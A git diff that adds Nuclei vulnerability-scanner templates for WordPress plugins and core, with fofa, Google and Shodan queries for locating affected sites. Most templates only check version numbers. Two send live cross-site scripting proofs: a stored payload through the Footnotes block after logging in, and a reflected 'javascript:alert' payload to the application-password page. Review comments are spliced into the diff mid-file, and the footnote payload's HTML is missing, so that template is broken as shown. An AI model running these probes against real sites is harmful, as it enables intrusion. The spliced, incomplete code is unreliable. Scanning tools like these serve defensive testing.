diff --git a/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml b/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
new file mode 100644
index 0000000000..c9637d5d13
--- /dev/null
+++ b/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
@@ -0,0 +1,59 @@
+id: green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c
+
+info:
+ name: >
+ TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/"
+ google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "green-wp-telegram-bot-by-teplitsa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml b/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml
new file mode 100644
index 0000000000..1b6b4f0928
--- /dev/null
+++ b/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml
@@ -0,0 +1,59 @@
+id: wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca
+
+info:
+ name: >
+ Category and Taxonomy Image <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5760933b-30e6-465b-9b94-c913b21f07fd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-custom-taxonomy-image/"
+ google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-image/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-image,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-image/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-custom-taxonomy-image"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml b/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
new file mode 100644
index 0000000000..42815ac58a
--- /dev/null
+++ b/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
@@ -0,0 +1,59 @@
+id: wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c
+
+info:
+ name: >
+ Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/"
+ google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-custom-taxonomy-meta"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml b/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml
new file mode 100644
index 0000000000..d0ba3aba6c
--- /dev/null
+++ b/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml
@@ -0,0 +1,59 @@
+id: wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769
+
+info:
+ name: >
+ Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/"
+ google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-custom-taxonomy-meta"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml b/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml
new file mode 100644
index 0000000000..a3576d9147
--- /dev/null
+++ b/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml
@@ -0,0 +1,59 @@
+id: wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d
+
+info:
+ name: >
+ Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/"
+ google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-custom-taxonomy-meta"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-footnote-xss.yaml b/poc/wordpress/wp-footnote-xss.yaml
new file mode 100644
index 0000000000..9af6fd41f7
--- /dev/null
+++ b/poc/wordpress/wp-footnote-xss.yaml
@@ -0,0 +1,87 @@
+id: wp-footnote-xss
+
+info:
+ name: WordPress 6.3-6.3.1 Footnotes Block - Cross-Site Scripting
+ author: nqdung2002
+ severity: medium
+ description: |
+ WordPress does not escape some of its Footnotes block options before outputting them back in a page/post where the block is embed.
+ impact: |
+ This could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-63-631-authenticatedcontributor-cross-site-scripting-via-footnotes-block?asset_slug=wordpress
+ - https://wpscan.com/vulnerability/63270b61-dddd-4cc0-a091-a04cb4f682ec/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cwe-id: CWE-79
+ metadata:
+ max-request: 4
+ framework: wordpress
+ tags: wpscan,xss,wp,wordpress,footnote,xss,authenticated
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/post-new.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ X-HTTP-Method-Override: PUT
+ X-WP-Nonce: {{nonce}}
+
+ {
+ "id": {{postid}},
+ "title": "Stored XSS via Footnote Block",
+ "content": "\n

Test CVE1

\n\n\n",
+ "meta": {
+ "footnotes": "[{\"content\":\"\",\"id\":\"testid\"}]"
+ },
+ "status": "pending"
+ }
+
+ - |
+ GET /?p={{postid}} HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_4 == 200'
+ - 'contains(body_4, "")'
+ - 'contains(header_4, "text/html")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: postid
+ part: body_2
+ group: 1
+ regex:
+ - 'post=(\d+)'
+ internal: true
+
+ - type: regex
+ name: nonce
+ part: body_2
+ group: 1
+ regex:
+ - 'createNonceMiddleware\(\s"(.*)\"\s\)'
+ internal: true
+
+# digest: 4a0a004730450220286bf1fe3dfd6257d48badcbd97cf02115d6200716f48a44f0db64aa7bae592a022100f0c98085b7cfec6178569dcb7bf73f45d94fb18cbb5633054a1fe2eeb6e6809e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml b/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml
new file mode 100644
index 0000000000..0ec830cb71
--- /dev/null
+++ b/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml
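Review bot: Request 3 in wp-footnote-xss.yaml relies on `{{postid}}` and `{{nonce}}`, but nothing verifies that the login in request 1 succeeded before `post-new.php` is fetched, so on a failed login the extractors find nothing and the later requests run with empty or unresolved values (nuclei presumably skips them, but the template should not depend on that); adding `- 'contains(header_1, "wordpress_logged_in")'` to the final `and` dsl list turns that case into a clean negative. The template also creates a post (`"status": "pending"`) that is never removed, which belongs in `description` or `impact` so operators know a scan leaves content on the target. `tags` lists `xss` twice. The identical file is added again as poc/xss/wp-footnote-xss.yaml with the same blob (`9af6fd41f7`) and the same `id`, so one copy should go; the rendered page has also lost the HTML inside the `content` string, so the JSON body in both hunks cannot be reviewed from here.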
@@ -0,0 +1,59 @@
+id: wp-members-d9bd5a558214a2feec4d73014329df0f
+
+info:
+ name: >
+ WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-members/"
+ google-query: inurl:"/wp-content/plugins/wp-members/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-members,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-members"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.9.5')
\ No newline at end of file
diff --git a/poc/xss/application-pass-xss.yaml b/poc/xss/application-pass-xss.yaml
new file mode 100644
index 0000000000..7c6ed70b5d
--- /dev/null
+++ b/poc/xss/application-pass-xss.yaml
@@ -0,0 +1,61 @@
+id: application-pass-xss
+
+info:
+ name: WordPress Core 5.6 and 6.3.1 - Cross-Site Scripting
+ author: nqdung2002
+ severity: medium
+ description: |
+ WordPress Core is vulnerable to Reflected Cross-Site Scripting via the 'success_url' and 'reject_url' parameters when requesting application passwords in versions between 5.6 and 6.3.1 due to insufficient input sanitization and output escaping of pseudo protocol URIs.
+ impact: |
+ This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link and accepting or rejecting the application password.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-56-631-reflected-cross-site-scripting-via-application-password-requests?asset_slug=wordpress
+ - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cwe-id: CWE-79
+ metadata:
+ max-request: 3
+ vendor: wordpress
+ product: wordpress
+ framework: wordpress
+ shodan-query:
+ - cpe:"cpe:2.3:a:wordpress:wordpress"
+ - http.component:"wordpress"
+ fofa-query: body="oembed" && body="wp-"
+ tags: wpscan,wp,wordpress,authenticated,xss
+
+http:
+ - raw:
+ - |
+ GET /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "/wp-content/plugins")'
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/authorize-application.php?success_url=javascript%3Aalert%28document.domain%29&reject_url=javascript%3Aalert%28document.domain%29 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "javascript:alert(document.domain)")'
+ - 
'contains(content_type_2, "text/html")'
+ - 'status_code_2 == 200'
+ condition: and
+
+# digest: 490a004630440220221cdd4741e12c68ae20be1b7466c1a5daa5bda899de1e7017c2e659dba0c358022021d77521dec764e6c229ab04868a83b66f2be4b3c778953a3c981b4c56c0b858:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/xss/wp-footnote-xss.yaml b/poc/xss/wp-footnote-xss.yaml
new file mode 100644
index 0000000000..9af6fd41f7
--- /dev/null
+++ b/poc/xss/wp-footnote-xss.yaml
@@ -0,0 +1,87 @@
+id: wp-footnote-xss
+
+info:
+ name: WordPress 6.3-6.3.1 Footnotes Block - Cross-Site Scripting
+ author: nqdung2002
+ severity: medium
+ description: |
+ WordPress does not escape some of its Footnotes block options before outputting them back in a page/post where the block is embed.
+ impact: |
+ This could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-63-631-authenticatedcontributor-cross-site-scripting-via-footnotes-block?asset_slug=wordpress
+ - https://wpscan.com/vulnerability/63270b61-dddd-4cc0-a091-a04cb4f682ec/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cwe-id: CWE-79
+ metadata:
+ max-request: 4
+ framework: wordpress
+ tags: wpscan,xss,wp,wordpress,footnote,xss,authenticated
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/post-new.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ X-HTTP-Method-Override: PUT
+ X-WP-Nonce: {{nonce}}
+
+ {
+ "id": {{postid}},
+ "title": "Stored XSS via Footnote Block",
+ "content": "\n
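Review bot: The login POST in application-pass-xss.yaml sends `testcookie=1` without a `Cookie: wordpress_test_cookie=...` header, unlike the login request in wp-footnote-xss.yaml from the same author in this commit; WordPress's login handler rejects a submission that posts `testcookie=1` while the test cookie is absent, so this step only succeeds if the cookie jar carries the cookie set by the preceding GET `/wp-login.php` — presumably it does, but the template should not depend on it, so add `Cookie: wordpress_test_cookie=WP%20Cookie%20check` to the POST as the sibling template does. `name: WordPress Core 5.6 and 6.3.1` reads as two specific releases while the description says all versions between them; `name: WordPress Core 5.6 - 6.3.1 - Reflected Cross-Site Scripting` matches the description and the reference title. The final matcher is split across two physical lines on this page (`- ` at the end of the previous line, `'contains(content_type_2, "text/html")'` here), which looks like a rendering artefact rather than a defect in the file.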

Test CVE1

\n\n\n",
+ "meta": {
+ "footnotes": "[{\"content\":\"\",\"id\":\"testid\"}]"
+ },
+ "status": "pending"
+ }
+
+ - |
+ GET /?p={{postid}} HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_4 == 200'
+ - 'contains(body_4, "")'
+ - 'contains(header_4, "text/html")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: postid
+ part: body_2
+ group: 1
+ regex:
+ - 'post=(\d+)'
+ internal: true
+
+ - type: regex
+ name: nonce
+ part: body_2
+ group: 1
+ regex:
+ - 'createNonceMiddleware\(\s"(.*)\"\s\)'
+ internal: true
+
+# digest: 4a0a004730450220286bf1fe3dfd6257d48badcbd97cf02115d6200716f48a44f0db64aa7bae592a022100f0c98085b7cfec6178569dcb7bf73f45d94fb18cbb5633054a1fe2eeb6e6809e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file